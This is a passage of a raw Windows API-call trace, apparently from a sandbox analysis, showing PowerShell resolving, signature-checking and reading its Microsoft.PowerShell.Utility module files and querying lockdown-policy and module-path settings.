CloseHandle (hObject=0x500) returned 1 [0089.231] CoCreateGuid (in: pguid=0x4ebe5d8 | out: pguid=0x4ebe5d8*(Data1=0x36f05155, Data2=0x859d, Data3=0x4658, Data4=([0]=0xb5, [1]=0xe5, [2]=0x73, [3]=0x54, [4]=0x6, [5]=0x20, [6]=0x97, [7]=0x4a))) returned 0x0 [0089.231] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebe338 | out: lpPerformanceCount=0x4ebe338*=1641204809075) returned 1 [0089.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0089.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0089.232] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe024) returned 1 [0089.232] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x4ebe2e8 | out: lpFileInformation=0x4ebe2e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7a09930, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0xd7a09930, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x2f20f74b, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x982)) returned 1 [0089.232] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe020) returned 1 [0089.232] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0089.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0089.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0089.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0089.232] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebdfb8) returned 1 [0089.232] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x4ebe27c | out: lpFileInformation=0x4ebe27c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7a09930, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0xd7a09930, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x2f20f74b, 
ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x982)) returned 1 [0089.232] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebdfb4) returned 1 [0089.232] CoTaskMemAlloc (cb=0x10) returned 0x425e6b8 [0089.233] CoTaskMemAlloc (cb=0x10) returned 0x425e6e8 [0089.233] CoTaskMemAlloc (cb=0xe4) returned 0x33cef8 [0089.233] CoTaskMemAlloc (cb=0x30) returned 0x4248690 [0089.233] WinVerifyTrust () returned 0x800b0100 [0089.243] CoTaskMemFree (pv=0x425e6b8) [0089.243] CoTaskMemFree (pv=0x4248690) [0089.243] CryptCATHandleFromStore () returned 0x2bf9b8 [0089.244] WTHelperGetProvSignerFromChain () returned 0x0 [0089.244] CoTaskMemAlloc (cb=0x10) returned 0x425e6b8 [0089.244] CoTaskMemAlloc (cb=0x30) returned 0x4248690 [0089.244] WinVerifyTrust () returned 0x0 [0089.244] CoTaskMemFree (pv=0x4248690) [0089.244] CoTaskMemFree (pv=0x425e6b8) [0089.244] CoTaskMemFree (pv=0x33cef8) [0089.244] CoTaskMemFree (pv=0x425e6e8) [0089.284] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\en-US\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\en-us\\microsoft.powershell.utility.psd1")) returned 0xffffffff [0089.285] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\en\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\en\\microsoft.powershell.utility.psd1")) returned 0xffffffff [0089.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0089.285] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0089.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0089.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x50, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f [0089.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x64 [0089.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml", nBufferLength=0x64, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml", lpFilePart=0x0) returned 0x63 [0089.296] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebda74) returned 1 [0089.296] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\psgetmoduleinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x4ebdd38 | out: lpFileInformation=0x4ebdd38*(dwFileAttributes=0x0, 
ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0089.296] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebda70) returned 1 [0089.297] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0089.297] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Commands.Utility.dll\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.commands.utility.dll\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0089.297] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x4ebda04, nSize=0xbc | out: lpBuffer="") returned 0x95 [0089.300] GetFileAttributesW (lpFileName="C:\\Users\\5AlR3U30D3\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\5alr3u30d3\\documents\\windowspowershell\\modules")) returned 0xffffffff [0089.307] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules")) returned 0x10 [0089.308] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x51 [0089.308] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility", nBufferLength=0x51, 
lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility", lpFilePart=0x0) returned 0x50 [0089.308] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebd87c) returned 1 [0089.308] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.commands.utility"), fInfoLevelId=0x0, lpFileInformation=0x4ebdb40 | out: lpFileInformation=0x4ebdb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0089.308] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebd878) returned 1 [0089.311] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.commands.utility\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0089.314] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules")) returned 0x10 [0089.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x59 [0089.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility", nBufferLength=0x59, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility", lpFilePart=0x0) returned 0x58 [0089.316] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebd87c) returned 1 [0089.316] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.commands.utility"), fInfoLevelId=0x0, lpFileInformation=0x4ebdb40 | out: lpFileInformation=0x4ebdb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0089.316] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebd878) returned 1 [0089.319] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.commands.utility\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0089.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x9a [0089.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x9a, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x99 [0089.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x9a [0089.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x9a, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x99 [0089.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x9a [0089.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x9a, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x99 [0090.246] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: 
"c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1")) returned 0x20 [0090.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0090.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0090.247] NtQuerySystemInformation (in: SystemInformationClass=0xa4, SystemInformation=0x4ebd8a0, Length=0x20, ResultLength=0x4ebd910 | out: SystemInformation=0x4ebd8a0, ResultLength=0x4ebd910*=0x0) returned 0xc0000003 [0090.247] GetSystemInfo (in: lpSystemInfo=0x4ebd91c | out: lpSystemInfo=0x4ebd91c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0090.248] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebd8ac | out: phkResult=0x4ebd8ac*=0x4d8) returned 0x0 [0090.248] RegQueryValueExW (in: hKey=0x4d8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x4ebd8c8, lpData=0x0, lpcbData=0x4ebd8c4*=0x0 | out: lpType=0x4ebd8c8*=0x0, lpData=0x0, lpcbData=0x4ebd8c4*=0x0) returned 0x2 [0090.248] RegCloseKey (hKey=0x4d8) returned 0x0 [0090.248] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0090.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0090.248] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebd650) returned 1 [0090.248] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x637d658 | out: lpFileInformation=0x637d658*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6d3e2f0, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0xd6d3e2f0, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x2f214576, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x7778)) returned 1 [0090.248] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebd64c) returned 1 [0090.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0090.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0090.248] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebd610) returned 1 [0090.249] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x4ebd8d4 | out: lpFileInformation=0x4ebd8d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6d3e2f0, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0xd6d3e2f0, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x2f214576, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x7778)) returned 1 [0090.249] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebd60c) returned 1 [0090.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0090.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0090.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0090.249] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0090.249] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebd5a4) returned 1 [0090.249] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x4ebd868 | out: lpFileInformation=0x4ebd868*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6d3e2f0, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0xd6d3e2f0, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x2f214576, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x7778)) returned 1 [0090.249] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebd5a0) returned 1 [0090.249] CoTaskMemAlloc (cb=0x10) returned 0x425e9a0 [0090.249] CoTaskMemAlloc (cb=0x10) returned 0x425e5c8 [0090.250] CoTaskMemAlloc (cb=0xe4) returned 0x33cef8 [0090.250] CoTaskMemAlloc (cb=0x30) returned 0x42484d0 [0090.250] WinVerifyTrust () returned 0x800b0100 [0090.267] CoTaskMemFree (pv=0x425e9a0) [0090.267] CoTaskMemFree (pv=0x42484d0) [0090.267] CryptCATHandleFromStore () returned 0x2bfda8 [0090.267] WTHelperGetProvSignerFromChain () returned 0x0 [0090.267] CoTaskMemAlloc (cb=0x10) returned 0x425e9a0 [0090.267] CoTaskMemAlloc (cb=0x30) returned 0x42484d0 [0090.267] WinVerifyTrust () returned 0x0 [0090.267] CoTaskMemFree (pv=0x42484d0) [0090.267] CoTaskMemFree (pv=0x425e9a0) [0090.267] CoTaskMemFree (pv=0x33cef8) [0090.267] CoTaskMemFree 
(pv=0x425e5c8) [0090.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0090.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0090.268] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebd85c) returned 1 [0090.268] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d8 [0090.269] GetFileType (hFile=0x4d8) returned 0x1 [0090.269] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebd858) returned 1 [0090.269] GetFileType (hFile=0x4d8) returned 0x1 [0090.269] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd898*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd898*=0) returned 0x0 [0090.269] ReadFile (in: hFile=0x4d8, lpBuffer=0x637ee6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8c4, lpOverlapped=0x0 | out: lpBuffer=0x637ee6c*, lpNumberOfBytesRead=0x4ebd8c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.270] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, 